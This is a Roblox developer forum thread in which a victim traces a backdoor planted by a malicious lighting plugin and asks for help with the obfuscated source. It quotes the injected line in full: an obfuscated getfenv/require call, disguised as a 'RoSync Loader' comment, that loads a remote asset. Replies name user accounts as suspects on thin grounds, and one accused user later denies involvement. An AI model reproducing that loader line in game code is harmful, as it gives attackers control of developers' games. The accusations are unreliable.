Tracking down Backdoor Source - Obfuscated Script - Attempting damage control

NoobFragged · January 14, 2021, 6:58pm

You can write your topic however you want, but you need to answer these questions:

I want to help find the person responsible for these backdoors and malicious plugins and help Roblox see that they do not continue their crimes.

Note I did all of the footwork tracking down dozens and dozens of plugins and many accounts to make this task easier. I am just stuck on the obfuscated part.

I also need to do damage control as this was found in one of my games that I’m getting ready to launch as well as a couple that I am working on. I feel deeply sorry for any devs who have gone through this.

I am not good at dealing with obfuscated code, this isn’t exactly my realm. I only had the patience to track this down because I’m a bit obsessive and I really want justice against this person.

A bonus would be if someone capable of getting Roblox staff to address this issue. I doubt I have such influence, I’m not sure if this post will get much response.

What is the issue? Include screenshots / videos if possible!
Well, it looks like some of my games may have been stolen by a backdoor which could easily destroy the last year of my work.

It Started with a plugin that installed malicious code and a back door. I was trying to learn some better lighting controls and I had installed this plugin. I deleted it soon after but I know it had the opportunity to run.

This is the code it inserted into my games:

--[[ Last synced 1/7/2021 04:16  RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--

Which appears to have come from this malicious plugin:

What solutions have you tried so far? Did you look for solutions on the Developer Hub?

I have used a baseplate and tracked down every instance of this plugin which was very hard because at first it was smart and every time I clicked a script that is created, it deleted the script.

I narrowed it down to the last user and plugin I can get to but the script was obfuscated with PSU Obfuscator 4.0.A

The apparent source for the original malicious plugin is this obfuscated plugin:

This is the more recent alt that is the source of that plugin:
https://www.roblox.com/users/1722897238/profile/

Here is a list of all the plugins that link to one another and all of the related accounts.

BACKDOOR SOURCE.txt (35.8 KB)

CoderHusk · January 14, 2021, 7:04pm

I think the most suspicious indivdual is this since he is following the person you mentioned and has like some hacker pictures on his youtube channel
https://www.roblox.com/users/77663253/profile

NoobFragged · January 14, 2021, 7:09pm

So what do you think it would take to get Roblox to look into this and do something about it?

CoderHusk · January 14, 2021, 7:10pm

Nothing really, only thing you can really do is just stop using open source material like i did years ago

NoobFragged · January 14, 2021, 7:11pm

This didn’t come from open source.
It came from a malicious plugin.
Using a chain of malicious plugins.

I accidentally got hit with it when I was attempting to get better with lighting and had downloaded some lighting mods to try out.

CoderHusk · January 14, 2021, 7:12pm

open source = plugin, free model, etc

NoobFragged · January 14, 2021, 7:14pm

so the answer to attempting to bring a thief who is stealing peoples games to justice is that nothing can be done, they should just be left to rob people, and we should stop using plugins?

CoderHusk · January 14, 2021, 7:15pm

i mean what you want me to do you can always file a report to support but roblox has already known this for a while

NoobFragged · January 14, 2021, 7:17pm

They know all of these accounts that are linked and where they go?
Because it doesn’t appear so.

What it appears is they banned the owner of the group that published the lighting plugin, that’s it.
Every linking account all the way back to the source accounts all appear to be perfectly in tact.

I spent two days tracking down all of those plugins and the accounts that published them.
I highly doubt Roblox did this work.
If they did, I don’t think they would all still be there.

CoderHusk · January 14, 2021, 7:18pm

Look if I was able to find with high certain the person who made it in about 5 minutes I am sure roblox knows. I am just not the guy you should be talking to about this

NoobFragged · January 14, 2021, 7:20pm

You did so with the destination account that I spent two days hunting down.
Nothing anywhere suggests this has been found.

I’m not suggesting you personally handle it.
I posted this hoping someone who has some ability to do something does.

NoobFragged · January 14, 2021, 7:22pm

I have tracked down over 50 plugins now and the list is actually still growing.
The first lighting plugin spiders off into even more accounts and more plugins.
There’s so many it’s insane.

NoobFragged · January 14, 2021, 7:27pm

Well this account is a very old account that is linked through this too.

https://www.roblox.com/users/189414302/profile/

They published this plugin also part of the chain

https://www.roblox.com/library/3494746900/aaaa

NoobFragged · January 14, 2021, 7:30pm

It seems there are 4 requires that go off from this (per sniffer) that link back to the same plugin.

The one above and these 3. Two of the 4 are banned, which tells me Roblox is attempting to take action against this. I would simply like to be of assistance.

https://www.roblox.com/library/4966993425/Asset
by RobloxDeveloperTools (account banned)

https://www.roblox.com/library/4995795502/unnamed
by KekTeam0x0 (account banned)

https://www.roblox.com/library/4957723425/roblo
by this account:
https://www.roblox.com/users/1596839446/profile/

robloxuser9065 · January 15, 2021, 8:02pm

I’m a victim of this, and I installed this plugin via a post in #resources:community-resources. Next thing I know, whenever I press enter in a script, some stuff comes up about “RoSync Loader” and blah blah blah.

NoobFragged · January 16, 2021, 7:30am

feel free to message me I will give you all the info I have.
I’m trying to help locate all of those involved and see they find justice from Roblox.

VortexColor · January 16, 2021, 7:45am

Please post all malicious plugins, models and scripts here

Lewin4 · March 29, 2021, 7:50am

Sorry for bumping this post, but just here to clarify that I’m not the person behind this backdoor, and I’ve never created any plugins nor uploaded any models on Roblox.
I’m not affiliated with UltraSurfMaker, but I sometimes follow any accounts I find interesting or want to find later, and I can’t remember why I followed them.
The banner picture on my YouTube channel was for an cryptography puzzle I created for some of my friends over a year ago, which had no relation to Roblox at all.

HTTPMovedPermanently · March 29, 2021, 11:26am

Hey, sorry if I’m bumping in on you here, I just thought I’d reach out and let you know of a possible method to figure out the root modulescript causing the backdoor to be added.

If it’s using require, which most do, you can use a Lua sandbox and make the sandbox print out anything running, which should return the requiring code string and the ID it’s using after require( ).

Here’s an idea of a sandbox you could use, I personally use this one, and it’s really useful.

VelcroDune · March 29, 2021, 11:59am

Look into console command by pressing F9, after you can determine where the script is coming from